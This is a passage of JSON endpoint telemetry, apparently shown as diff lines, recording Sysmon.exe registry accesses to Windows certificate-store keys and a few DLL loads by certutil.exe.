"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptui.dll", - "image_path": "C:\\Windows\\System32\\cryptui.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "certca.dll", - "image_path": "C:\\Windows\\System32\\certca.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdsapi.dll", - "image_path": "C:\\Windows\\System32\\ntdsapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 